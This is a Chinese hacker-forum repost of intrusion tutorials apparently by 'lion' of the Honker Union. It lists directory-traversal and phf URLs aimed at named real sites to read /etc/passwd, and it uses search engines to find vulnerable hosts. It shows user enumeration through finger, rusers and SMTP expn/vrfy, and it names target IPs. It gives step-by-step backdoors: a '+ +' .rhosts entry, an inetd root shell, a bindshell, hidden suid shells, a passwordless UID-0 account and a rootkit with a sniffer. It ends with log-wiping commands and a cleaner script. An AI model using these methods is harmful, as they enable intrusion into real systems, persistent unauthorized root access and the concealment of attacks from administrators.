http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd



这个php.cgi漏洞只能读文件。

我们还是用乱刀来跑密码吧。

找到用户密码后,你也可以telent或者ftp一下哦。



我又是怎么找出来的呢?

别急

等一下告诉你。



名字:loadpage.cgi

描述:可以用来查看任意文件,首先用浏览器找到当前路径,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 这时可能会返回一个错误信息: Cannot open file /home/www/shop/XYZ

现在可以替换为下面的格式,
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径>/<文件名>

具体如下:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd



大家看看:
http://www.valueindia.com.au/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd

哦,他妈的,@#$%@$@#%$!~……

前几天我还可以看到密码档的。

现在可能打上补丁了,或者删掉了,要不就被防火墙过滤了。

我靠,我们来看看另一个。
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd

嗯,为什么是500错误?

漏洞手册上是这样的啊。

呵呵

我们要灵活应用嘛,是路径问题。

我们改成:http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../etc/passwd

Cannot open file /usr/local/etc/httpd/htdocs/bigfivestuff/store//../../etc/passwd

??

还是路径问题。

我们的路径不够深入。

当前目录是在:/usr/local/etc/httpd/htdocs/bigfivestuff/store/

/../../etc/passwd只向上跳两层。

也就是在/usr/local/etc/httpd/htdocs/

还有五层目录。

我们就添加五层"../"
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../etc/passwd

大家看到了吗?

密码档

不过是shadow了的。

我们一样可以用流光生成用户列表然后FTP简单探测。

:)

大家还要吗?
http://qtb.com/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.cheapcellphones.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.boutiquesensuale.net/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
http://www.patches3.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.topten.it/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.palmcentre.co.uk/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
http://www.storefinder.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd



够你晕了吧

一大堆密码档

我来说说我是怎么找到的吧。

:)我们进入http://www.google.com/ (一个很不错的搜索引擎)

当然你也可以用http://www.yahoo.com

在输入框里我们输入 /cgi-bin/phf 然后回车

我们会发现类似如下内容的页面。

已向英特网搜索/cgi-bin/phf. 共约有7,320项查询结果,这是第1-10项 。搜索用时0.08秒。

类别: Regional > North America > ... > DOE National Laboratories > Ames Laboratory

Untitled

lcweb.loc.gov/cgi-bin/phf/ - 类似网页

Untitled

lcweb.loc.gov/cgi-bin/phf - 类似网页

Ames Phone Book - People

类别: Regional > North America > ... > DOE National Laboratories >

Ames Laboratory

ph.iastate.edu/cgi-bin/phf - 类似网页



这些网站都有/cgi-bin/phf

也就有可能他们的版本刚好是有上面的漏洞的那个,而没有打补丁!

我们试试http://xxx.xxxxxxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

不行就试试搜索/cgi-bin/php.cgi /cgi-bin/loadpage.cgi

当然你也可以试其他类似的漏洞。

互连网这么大,总是能找到有的!

但我们这样做太笨了点。

毕竟这不是新漏洞,要找到一个能用的太难了。

但我们为什么不想想?

如果新发现什么漏洞可以直接读取文件或者运行命令的,我们一样可以用搜索引擎来找到有这个漏洞的主机啊。

为什么三年前的漏洞我们还能看到呢?

就象每个人都不一样,当然并不是每个网管都很负责的。:)

还有,如果你有什么漏洞不懂,或者你要找什么资料软件等,也一样可以利用搜索引擎来找!

比如,我们对twwwscan 的扫描结果:Frontpage98 Hole(_vti_inf.html) 不了解,我们就可以在搜索引擎里输入_vti_inf.html,你肯定可以找到很多相关的文章和资料的。

这就是一个小窍门了。:)

因为这些引擎的资料都是用机器人来找的,他是不断更新和添加的。这个机器人不是我们平时听到的什么机器人,他是一个用perl或者其他语言编的网络蠕虫程序,也有人用这些程序来找e-mail地址。OK,我走题了。

我们利用这些引擎,相信大家会找到很多你想要的东西的!



好了,转入正题。:)



相信大家都不知道该学些什么东西吧。

下面就是很好的介绍。



1.能用C.C++.perl或者其他语言进行编程。

 对一个黑客来说,这是基本要求。很多安全工具都是用C/C++ 或者perl语言编写的。初级黑客至少要能看懂,编译,执行和熟练运用这些程序。你才能利用这些现成的工具来攻击。更进一步,你还要有能把某些软件移植到其他平台的能力,或者,你自己要有开发的能力。比如,开发一些新的工具或者在原来的工具上扩展!

2.熟悉TCP/IP协议。

 这也是一名黑客要必备的素质。没有对协议和协议本身的的正确彻底的了解,而只会天天胡乱利用工具乱搞一阵,那你永远不会有进步的。只有对Internet工作原理基本了解,你更加不用谈什么攻击。学习协议知识的途径是先熟读RFC,这里有一个地方可以:http://www.attrition.org/~modify/texts/rfc/

3.熟悉两种以上操作系统。

 比如NT/2000 Linux Unix Sunos等等。

 UNIX系列是必须懂得一种的。

4.多跟踪最新的漏洞资料和工具。

 多多注意网上公布的漏洞资料和工具。

 国内的反应相对来说比较慢。

 推荐大家去:http://www.securityfocus.com/

5.要成为黑客,就必须动手去Hacking.

 除了多看点入侵教程外,看完后然后一定要自己动手!只有自己动手去hacking.你才能有进步。只有经过大量的实践,你才能熟练运用各种攻击方法。纸上谈兵是没用的。看再多的教程你自己不动手也是没用的!到头来还是一无所知!

6.人只有靠自己。

 很多网友添加我为好友后,第一句话就是:“我拜你为师好吗?”:(我倒,又来一个。

 当你越深入研究Hack技术,你就会发现自己懂得的越少!我真正懂的并不多。我实在也无能力做你们的老师,我只是一个很普通的网络技术爱好者。别把我看得太高。也许我是最菜的。:)

 其实,并不是所有的人都象你那么有空,每个人都有工作,都有自己的事情,没有人会完全替你着想!也没人愿意把时间花在这样无聊的事情上面。大家应该站在另一个角度看,如果同时有20个人在OICQ上和你聊,你会怎么样?50个100个呢?你能应付吗? 

 同时,很多人也会找我破译信箱聊天室OICQ密码,聊天室踢人.....真是无聊,我吃饱没事做,也不会做这些重复的无聊的没有意义的事情,就算你破了10000个密码,你踢了10000个人又能说明你自己什么呢?朋友们,不要浪费你宝贵的上网时间!多做点有意义的东西吧。



一般我们hacking的步骤是:

1.收集资料

2.远程攻击

3.远程登陆

4.取得普通用户的权限

5.取得超级用户的权限

6.留下后门

7.清除日志



其中可以简单的分为:

1.取得第一个帐号

2.取得超级用户权限

3.留下后门

4.擦“脚印”



我们今天来说说如何找到我们的第一个帐号!





(1).首先我们先确定目标,比如反动站点!如果没什么具体的目标,就用上次我发给大家的Superscan 3.0汉化版来扫描一段网段,查找活动的主机。我喜欢用它扫描79端口。它扫描生成的资料很好。用多了就会知道的。:) 我们也可以用搜索引擎来找!比如我们在引擎中输入日本,就可以找到一大堆有关日本的网站和网页。然后我们就在当中找一个试试。:)



(2).然后就是资料收集。确定我们的目标后,我们要对他进行一系列的扫描。比如用Superscan 3.0来进行端口扫描。用Twwwscan 来进行WEB漏洞扫描。用Nmap,Saint,Satan或者其他一些扫描器对目标进行全方面的扫描。刚开始时我们说的就是一个很好的例子,看有什么漏洞能够直接得到密码档或者执行命令!这样可以省很多事情。



1.首先我们可能会先ping 一下主机!来判断一下主机的类型。

比如我们: ping www.eee.com.tw #假设地址:)



Pinging www.eee.com.tw [203.69.121.***] with 32 bytes of data:

Reply from 203.69.121.***: bytes=32 time=60ms TTL=243

Reply from 203.69.121.***: bytes=32 time=60ms TTL=243

Reply from 203.69.121.***: bytes=32 time=80ms TTL=243

Reply from 203.69.121.***: bytes=32 time=70ms TTL=243



Ping statistics for 203.69.121.***: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds:

 Minimum = 60ms, Maximum = 80ms, Average = 67ms

我们可以看到time=60ms是用的时间,反映跟目标机器的速度。

我们可以看到TTL=243 我们可以来大概看到机器的类型。Sunos 5.6 。如果TTL=128就是Win2000.这些大家平时也可一注意一下。:)慢慢积累嘛。



2. Ping了机器后,我们将对目标进行端口扫描,主要是是通过扫描找出目标系统开放的服务端口从而推断出目标系统上运行的服务,再根据这些服务查找相关的资料。 端口扫描有很多,我常用的是向大家吐血推荐的Superscan 3.0,常用的端口有:21=ftp,23=telent,25=smtp,79=finger,110=pop3,111=sunrpc, 513=login, 514=shell, 515=printer。。。

 21 ftp端口,我们可能就会联想到wu-ftp2.X远程溢出。

 23 telnet端口,至少我们知道可以远程登陆执行命令,telnet ip 上去看看系统信息。:)

 25 smtp端口,可以验证用户,还有sendmail系列的漏洞。

 79 finger端口,我们可以用这个端口列表主机的用户资料。:)

 110 pop3端口,我觉得他没什么用。

 111 rpc端口,试试一些著名的远程溢出。

 513 可以用rlogin,或者有的机器已经被人做了.rhosts后门了。:)也试试rlogin的远程溢出哦。

 514 跟rlogin差不多,不过他不用登陆。:)

 515 网络打印?试试netpr.c :)

。。。



所有这些服务或者无偿向外界提供关于系统的重要知识,或者提供某种使用户可以“登录”到系统的方法,或者使得用户可以远程执行系统中的程序,所以都有可能是网络入侵的重要途径。



3.我们一般扫描完端口后,开了23 telent, 就telnet ip 上去看看系统版本信息,然后再看看这个版本有没有什么重大的漏洞。:)

telnet www.eee.com.tw

我们可以看到类似的信息:

SunOS 5.6

login:

我们就可以看到它的是Sunos 5.6.

然后我们想想这个版本有什么好利用的漏洞吗?:)

这台机器也开了79端,我们来finger他一下,

这是最原始的也是最有效的获得第一个用户帐号的方法。

我们在Linux/UNIX/NT下执行,Win9x不能。

finger @www.eee.com.tw

看看有没有在线用户。

[www.eee.com.tw]

No one logged on

没人在线。

finger @www.eee.com.tw

[www.epson.com.tw]

Login Name TTY Idle When Where

robert RD         < . . . . >

rd-1 RD          < . . . . >

rd-2 RD          < . . . . >

rd-3 RD          < . . . . >

rd-4 RD          < . . . . >

agent all agents login 0 ettdb

artwork ???        < . . . . >

oracle ??? 287

eee survey ??? pts/2 epson5

eeeclub ???       < . . . . >

webadm ??? pts/1      eee5

agtrpt all agents login  < . . . . >

genuine ??? 791      ettdb

weblink ??? 349      eee5

wardpro ??? 791      ettdb

nstark ??? pts/1      eee5

eee ??? pts/2        202.111.143.*

cbgmaster ??? pts/2     210.12.11.*



我们的好东西出来了。

Login下面的就是主机上的用户!

我们也可以finger username@www.eee.com.tw来看相对应用户的资料。:)

finger cbgmaster@www.eee.com.tw



大家可以找台机器试试。

202.228.128.34

202.228.128.33

202.228.128.35

202.228.128.36

202.228.128.38

202.228.128.39

202.228.129.21

小日本的可以finger的IP

大家都看看吧。



关于Win9x的finger,我们可以用软件实现。比如天行的网络刺客2,和补天网的finerf.

这里我推荐finerf.

大家可以到这里下载:http://www.cnhonker.com/finger.zip

先杀毒哦。:)

在win9x下用Superscan 3.0扫描79端口,然后用fingerf得到用户是一个很好的配合!

如果finger出来的用户太多,我们可以用小榕的流光的ftp探测来帮我们验证。

一般来说,允许ftp的也允许在主机上telnet的。





我们也可以用rusers命令,"remote users",顾名思义,即询问远程主机关于其用户的信息,跟finger有类似之处。

rusers -l www.eee.com.tw

root www.eee.com.tw:console May 7 10:03 22 (:0)

john www.eee.com.tw:pts/6 May 7 12:56 26 (mor.com)

will www.eee.com.tw:pts/7 May 7 10:11 (zw.com)

mary www.eee.com.tw:pts/11 May 7 09:53 3:37 (foo.com)

paul www.eee.com.tw:pts/10 May 7 13:08 18 (sil.com)

列出www.eee.com.tw上所有活动的用户

这里这个命令我们只能在linux/Unix下用。

所以,我们最好自己装一个linux.



通过25端口确定用户。

telnet www.eee.com.tw 25

Trying xxx.xxx.xxx.xxx...

Connected to www.eee.com.tw.

Escape character is '^]'.

220 numen.com ESMTP Sendmail 8.9.1b+Sun/8.9.1; Fri, 7 May 1999 14:01:39 +0800

(CST)

expn root

250 Super-User <root@www.eee.com.tw>

expn eee

250 <eee@www.eee.com.tw>

vrfy www

550 www... User unknown

使用"vrfy"或"expn"命令,可以判断特定用户名是否存在主机上,

如上面"root,eee"为主机上存在的用户,"www"则是不存在的用户。

其用处在于:如果不能用finger或rusers获得目标主机上的用户列表,可以用这种方法猜测用户名

通过猜测一些常用帐号,我们来确定主机存在的用户名。

然后我们才能通过这个帐号来破解。



还有,我们通常也可以看看域名,主机名,主页的联系信箱来猜猜用户名。

主机名我们可以通过ftp上去看到。

C:\>ftp www.eee.com.tw

Connected to www.eee.com.tw.

220 eee FTP server (SunOS 5.6) ready.

  ===eee就是主机名!

User (www.eee.com.tw:(none)):

当然我们也可以猜测一些常用用户名来试主机的密码。

下面是我常见到的帐号信息。大家可以参考。

root admin sys guest ftp system system32 smtp mail site linux daemon bin test www adm html web webmaster anon oracle sybase database install john reboot tom sync info infomix public webadm webadmin server user 等等

大家完全可以做一个常用帐号字典来用ftp探测密码。

其中oracle用户的默认密码是oracle

碰到多了你会发现很多的密码都没改!



4.当然我们也要对对方进行一些漏洞扫描。以便看看我们有什么可以直接利用的漏洞。就省去破密码了。twwwscan 扫描web漏洞不错。比如看看有没有常用的php.cgi漏洞。其他的一些综合的强大的扫描就要用到nmap.satan等扫描器了。比如rpc漏洞等。这些程序都可以通过搜索引擎来找!



5.关键是我们平时知识的积累,确定一个目标,知道它的系统和服务,我们就能想到它的相关漏洞资料是最好的。当然我们的最高境界是发现漏洞。:)



第一篇关于UNIX的教程,乱写了一篇。:(

没办法。

对了。关于UNIX的命令我们将在下一篇介绍!



最后祝大家在新的世纪有更多的收获!

发布者: lion
来源: 红客联盟







文章版权归原作者所有, 未经允许请勿转载, 如有任何问题请联系我们. 


Copyright ? 2000-2003 HUC All Rights Reserved.

中国红客网络技术联盟 www.cnhonker.com
webmaster@cnhonker.net


B21层 发表时间: 11/10 20:25

回复: mingming8 [mingming8]   论坛用户   登录
《UNIX系列系统入侵教程》之三
发布: lion 日期: 10-27 类别: 新手上路 今日/总浏览: 5/1272 
http://www.cnhonker.com  http://www.cnhonker.net
红客联盟

Lion http://www.cnhonker.com
================================================================
写于 2001/02/04

《UNIX系列系统入侵教程》之三

     ------------------ UNIX系统后门的安放和日志的擦除

==========================================

附件:HUCkit.zip


教程所需软件:HUCkit.zip(附件)
http://www.cnhonker.com/HUCkit.zip


一.后门的安放


当我们通过某种手段控制一个主机时,为了使自己能再次光顾这台计算机,我们通常在这个机器上留下后门,以便我们再次访问.一个做得好的后门,即使在入侵被管理员发现后,仍然能让你再次访问到主机.

本文的意旨是让你学会如何在完全控制系统后保留自己的根用户权限,下面介绍一下我常用的制作后门的手法,不会也不可能覆盖到所有可能的方法,请原谅.





1.Rhosts + + 后门



  在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.

例如:

# echo '+ + ' > /usr/bin/.rhosts

# cat /usr/bin/.rhosts

+ +

# rlogin -l bin localhost

将不用输入密码直接用bin帐号rlogin登陆进你的机器.





2.Login后门



  在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露. 入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.

一般的rootkit包里都有login后门程序.





3.服务进程后门



  inetd 进程负责监听各个TCP和UDP端口的连接请求,并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单,基本形式如下:

(1) (2) (3) (4) (5) (6) (7)

shell stream tcp nowait root /usr/sbin/in.rshd in.rshd

login stream tcp nowait root /usr/sbin/in.rlogind in.rlogind

exec stream tcp nowait root /usr/sbin/in.rexecd in.rexecd

comsat dgram udp wait root /usr/sbin/in.comsat in.comsat

talk dgram udp wait root /usr/sbin/in.talkd in.talkd



1:第一栏是服务名称。服务名通过查询 /etc/services 文件(供 TCP 和 UDP 服务使用)或 portmap 守护进程(供 RPC 服务使用)映射成端口号。RPC(远程过程调用)服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。

2:第二栏决定服务使用的套接口类型:stream、dgram 或 raw。一般说来,stream 用于 TCP 服务,dgram 用于 UDP, raw 的使用很少见。

3:第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。

4:如果所说明的服务一次可处理多个请求(而不是处理一个请求后就退出),那么第四栏应置成 wait,这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适,那么在本栏中填 nowait。

5:第五栏给出运行守护进程的用户名。

6:第六栏给出守护进程的全限定路径名。

7:守护进程的真实名字及其参数。 如果所要处理的工作微不足道(如不需要用户交互),inetd 守护进程便自己处理。此时第六、七栏只需填上 'internal' 即可。所以,要安装一个便利的后门,可以选择一个不常被使用的服务,用可以产生某种后门的守护进程代替原先的守护进程。例如,让其添加 UID 0 的帐号,或复制一个 suid shell。



当然我们有一个更简单的方法,

下面的操作bind root shell 1524端口.

# echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x

# /usr/sbin/inetd -s /tmp/.x

# rm -f /tmp/.x

# telnet localhost 1524

Trying 127.0.0.1...

Connected to localhost. Escape character is '^]'.

#

# id

ksh: id^M: not found

# id;

uid=1002(gao) gid=1(other) euid=0(root)

ksh: ^M: not found

# exit;

Connection closed by foreign host.

#

注意,这样bind的shell在telnet上去后,你要在你想执行的命令后面添加一个" ; "号.即你要执行id命令的输入应为: id;

当然你也可以把ingreslock换成其他服务.具体请查看/etc/services寻找对应的服务名和端口.

下面为部分/etc/services内容.

# cat /etc/services

#ident "@(#)services 1.20 98/07/08 SMI" /* SVr4.0 1.8 */

#

# Network services, Internet style

#

tcpmux 1/tcp

echo 7/tcp

echo 7/udp

discard 9/tcp sink null

discard 9/udp sink null

systat 11/tcp users

daytime 13/tcp

daytime 13/udp

netstat 15/tcp

chargen 19/tcp ttytst source

chargen 19/udp ttytst source

ftp-data 20/tcp

ftp 21/tcp

telnet 23/tcp

smtp 25/tcp

mail time 37/tcp timserver

time 37/udp timserver

name 42/udp nameserver

whois 43/tcp nicname # usually to sri-nic

domain 53/udp

domain 53/tcp

bootps 67/udp # BOOTP/DHCP server

bootpc 68/udp # BOOTP/DHCP client

...

...





4.port bind suid Shell 后门



  入侵者可能在任意端口bind suid Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉.

  我提供的压缩包door.zip里有一个ekobackdoor-v1.1.tar,为linux下的bindshell程序包.大家可以自己编译一下.

  方法为,

修改ekobdoor.c

查找

#define PASSWORD "ekorulez"

把"ekorulez" 改成你要的密码.

比如

#define PASSWORD "cnhonker"

把ekobackdoor-v1.1.tar解压然后make

就可以了.

具体使用方法为:

# ./ekobdoor [opcion] [argumento]

下面为不用输入密码的



# ./ekobdoor -b 31337



c:\ telnet 200.45.0.115 31337

Trying 200.45.0.115...

Connected to 200.45.0.115.

Escape character is '^]'.

#



下面为需要输入密码的.

# ./ekobdoor -s 31337

 

c:\ telnet 200.45.0.115 31337

Trying 200.45.0.115...

Connected to 200.45.0.115.

Escape character is '^]'.



cnhonker --->输入密码.



#

这里的31337你可以改成你想要的端口.

当然它还有更多其他功能.具体你用 -h 查看

#./ekobdoor -h







5.suid shell



  在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。

#cp /bin/ksh /tmp/.sh

#chown root:root /tmp/.sh

#chmod +s /tmp/.sh

当你运行/tmp/.sh时,

这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行,具体看各个主机的情况而定.一般我们使用ksh.我们使用的溢出程序用来获得root权限的,也一般是溢出后执行/bin/ksh.

$id

uid=1002(oracle) gid=1(other)

$/tmp/.sh

#

#id

uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)

我们又是root了.

当然,为了更加隐蔽,我们不能把suid shell 放在/tmp

因为它是很容易被发现的.

我们应该放在深层的目录里面.

比如: 

/usr/X11/include/X11/

或者

/usr/lib/

等等

通常我做的是:

# mkdir /usr/lib/lib/ | mkdir /usr/lib/lib/...

# cp /bin/ksh /usr/lib/lib/.../lib

# chown root:sys /usr/lib/lib/.../lib

# chmod 4555 /usr/lib/lib/.../lib

# touch -r /bin/ksh /usr/lib/lib/.../lib

一个简单的suid shell安放好了.

不过,大家不要学我,我们要放在最隐蔽的地方.我新建目录的隐藏效果不是最好的.

我们必须利用现有的目录来安放,并且这个目录要有很多其它的文件做掩护.

大家不防试试/usr/man/下的目录.

很少管理员会检查这里的.

比如:

/usr/man/man1/

/usr/man/manl/

等.

比如:

# cp /bin/ksh /usr/man/man1/ja.1



:)当然具体要看你自己琢磨一下了.我敢说不难,最好多放置几个suid shell 在不同的目录.这样即使管理员发现了一个,也还有另外一个.:)





6.su 后门



  在流行的rootkit包里,一般都有su 后门程序,当你在目标机器上安装了以后,只要你有普通用户的访问权限,就可以用su的后门密码su成你想要的用户.:)

例如在装过su后门的机器上运行:

$id

uid=1002(oracle) gid=1(other)

$su root

passwd:cnhonker ->su后门密码.

#

#id

uid=0(root) gid=0(root)

成功su成root.而不管root的密码为什么密码.

另外还有一种是su 木马,用来骗取su 密码的.这里不在详述.





7.修改密码文件



  最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。

下面的操作增加一个不用密码的www用户,uid gid 都为0,还有最好先备份一下密码文件.

#cp /etc/passwd /tmp/passwd

#cp /etc/shadow /tmp/shadow

#echo 'www:x:0:0::/:/bin/sh' >> /etc/passwd

#echo 'www::::::::' >> /etc/shadow

# id uid=1002(gao) gid=1(other) euid=0(root) egid=0(root)

# su www

# id

uid=0(root) gid=0(root)

可以看到,su成www时将不用输入密码,同样,telnet 等也不用出示密码.

但这种方法很容易被发现,通常我们编辑密码文件修改里面没有使用的默认帐号.





8.Crontab 后门



根用户的 crontab 文件放在 /var/spool/crontab/root 中,其格式如下:

(1) (2) (3) (4) (5) (6)

0 0 * * 3 /usr/bin/updatedb



以上内容设置/usr/bin/updatedb程序于每星期三 0:0 运行。

其中:

1. 分钟 (0-60)

2. 小时 (0-23)

3. 日 (1-31)

4. 月 (1-12)

5. 星期 (1-7)

6. 所要运行的程序



我们只需在 /var/spool/crontab/root 中添加我们的后门程序即可。

比如运行一个产生一个高位port的bind root shell的程序.或者替换服务进程的程序.





9.rootkit后门包



这也是最常用有效实用的方法.

这里我提供一个我修改过的编译好的sun os sparc下的rootkit包,在HUCkit.zip里的sun.tar

使用方法为:

在取得sun os sparc 的root权限后

#tar -xf sun.tar

#cd sun

#./setup cnhonker



就可以了.

其中,

cnhonker为你要设的rootkit密码.

如果你只运行./setup

那么程序会随机为你生成一个密码.请记住它.它可是你的通行证哦.

还有我取消了login后门的安装,因为它很容易暴露自己.并且很容易出错.

还有,完全装好后,不要忘了去/dev/prom

用cat查看每一个文件哦.

:)

哪里是嗅探器存放结果的地方.包括 mail ftp telnet rlogin su 等等.

# cat /dev/prom/sn.l

为mail ftp telnet rlogin等的记录

# cat /dev/prom/sulog

为su的密码记录.没有必要花时间去破解shadow文件哦.:)

其它的rootkit包大家引擎搜索一下就可以找到很多.这里不再提供.





二.日志的清除









由于涉及的系统广泛的问题,不可能将所有unix类系统的日志说清楚,但它们大多是差不多的,下面我只用常见的sunos & redhat做介绍.其它的系统请查看相关资料.



unix系统日志文件通常是存放在"/var/log and /var/adm"目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf



其中sunos的在/var/log 和 /var/adm下.还有/usr/adm为/var/adm的的链接.

redhat的在/var/log 和 /var/run下.

下面的是sun os5.7中的日志样本.



# ls /var/adm

acct    log      messages.1    passwd    sulog   vold.log

aculog   messages   messages.2    sa      utmp    wtmp

lastlog   messages.0  messages.3    spellhist   utmpx   wtmpx

 

# ls /var/log

authlog      syslog    syslog.1   syslog.3

sysidconfig.log  syslog.0   syslog.2   syslog.4



下面的是redhat6.2中的日志样本.



# ls /var/log

boot.log   dmesg       messages.2    secure     uucp

boot.log.1  htmlaccess.log  messages.3    secure.1    wtmp

boot.log.2  httpd       messages.4    secure.2    wtmp.1

boot.log.3  lastlog      netconf.log   secure.3    xferlog

boot.log.4  mailllog      netconf.log.1  secure.4    xferlog.1

cron     maillog      netconf.log.2  sendmail.st   xferlog.2

cron.1    maillog.1     netconf.log.3  spooler     xferlog.3

cron.2    maillog.2     netconf.log.4  spooler.1    xferlog.4

cron.3    maillog.3     news       spooler.2

cron.4    maillog.4     normal.log    spooler.3

daily.log   messages     realtime.log   spooler.4

daily.sh   messages.1     samba       transfer.log



# ls /var/run

atd.pid    gpm.pid    klogd.pid   random-seed    treemenu.cache

crond.pid   identd.pid   netreport   runlevel.dir   utmp

ftp.pids-all inetd.pid   news      syslogd.pid



一般我们要清除的日志有

lastlog

utmp(utmpx)

wtmp(wtmpx)

messages

syslog

sulog



此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history(ksh),.history(csh),或.bash_history(bash)等。

 

一般把以上说的日志给擦一下,就可以了.:)

下面我来说说上面这些我们要清除的日志的相关资料和清除方法.更详细的资料和其他的日志请你查看相关资料.



首先我们说说这几种日志的功能.->它记录的是什么?



lastlog



lastlog记录每个用户的最近一次的登陆时间和每个用户的最初目的地.

当一个用户登陆到unix系统时,注册程序在lastlog文件中查找该用户的uid ,如果该程序找到了该用户的uid,unix就会显示最后一次登陆的时间和TTY(终端号)

下面是一个例子:

SunOS 5.7

login: gao

Password:

No directory! Logging in with home=/

Last login: Sun Feb 4 22:18:25 from 211.167.1.24

Sun Microsystems Inc. SunOS 5.7 Generic October 1998 $



.然后注册程序用新的登陆时间和TTY信息更新lastlog文件,而且该程序带更新utmp wtmp.文件.



utmp



utmp 日志记录以前登陆到系统中的所有用户.这个文件随着用进入和离开系统而不断的变化.它还会为系统中的用户保持很长的历史记录,utmp日志通常存储在/etc/utmp,可以使用w 和who 命令查看utmp.但其他的一些命令也可以访问这个文件.:)比如finger users.现在的utmp一般都有一个utmpx文件做为日志记录的补充.别忘了擦这个pp哦.:)



wtmp



wtmp文件记录用户登陆和退出事件,它和utmp类似.但它随着登陆的次数的增加它会变得越来越大.有些系统的ftp访问也在这个文件里记录.同时它也记录正常的系统退出时间.可以使用last和ac命令访问它.



syslog & messages



通过查看/etc/syslog.conf我们可以知道syslog记录些什么.:)

很多各种各样的程序产生的日志都由它记录.

同时它还有一个syslogd进程为它服务.

在缺省时,它把大多的信息传给/var/adm/messages



sulog



sulog为切换用户命令su的使用记录日志.

他通常在/var/adm/sulog

如果你在机器上用过su命令,别忘了清除掉哦.:)





shell记录



.sh_history(ksh),.history(csh),或.bash_history(bash)等,是shell执行时的历史记录.记录用户执行的命令.它一般存在于用户的主目录.别忘了去根目录看看哦.我入侵机器时,也经常能发现别人的hacking记录哦.:)所以你一定要记得清除.





1.日志都是一些文本形式的文件.最笨的方法是用文本编辑器来编辑日志文件.删除相关的记录.来达到擦拭脚印和隐藏自己的效果.

比如用vi等

但这样做是很笨的.太麻烦,工作量太大.

如果有50台机器要你处理,那么,呵呵....看你忙到什么时候

:)



2.以前我刚开始学unix时.经常用rm -f 来删掉日志.比如rm -f /usr/adm/lastlog

呵呵 

这样做是很蠢的.

更容易被管理员发现有人入侵.但是,相对来说自己还是保护好了.:)

可以用在一些不太重要的机器上.



3.用 > 定向符清除.

比如:

#cat > /usr/log/lastlog

  ->这里输入你要的写的东西.最好伪装得像一些,也可以不输入哦.:)

^d ->这里的^d是按键 ctrl + d.

#

如果上战场没有带日志清除工具,我一般也用这个清除的.:)省事

要不找几个旧的日志覆盖它:)





==========================================================

4.当然最好的是用日志清除工具.

输入几个命令让程序帮你擦:)



a.常见的日志清除工具.

 一般的rootkit包里有的:z2.c 和wted.c

很容易找到.

网上的教程很多都是介绍这两个工具的使用的.

这里我就不再论述了.:)节省时间.



b.这里我提供一个我以前有段时间常用的日志清除脚本.

在HUCkit.zip里的 cleaner.sh

我们这样使用它



# chmod 755 cleaner.sh

# ./cleaner.sh

Log cleaner v0.5b By: Tragedy/Dor *

* Usage: cleaner.sh <string>

# ./cleaner.sh username



其中,username 为你要清除日志的的用户帐号.

:)

比如:



#./cleaner.sh gao

Log cleaner v0.5b By: Tragedy/Dor OS

detection....

Detected SunOS

---<[ Log cleaning in process....

* Cleaning aculog ( 0 lines)...0 lines removed!

* Cleaning lastlog ( 19789 lines)...45 lines removed!

* Cleaning messages ( 12 lines)...1 lines removed!

* Cleaning messages.0 ( 12 lines)...0 lines removed!

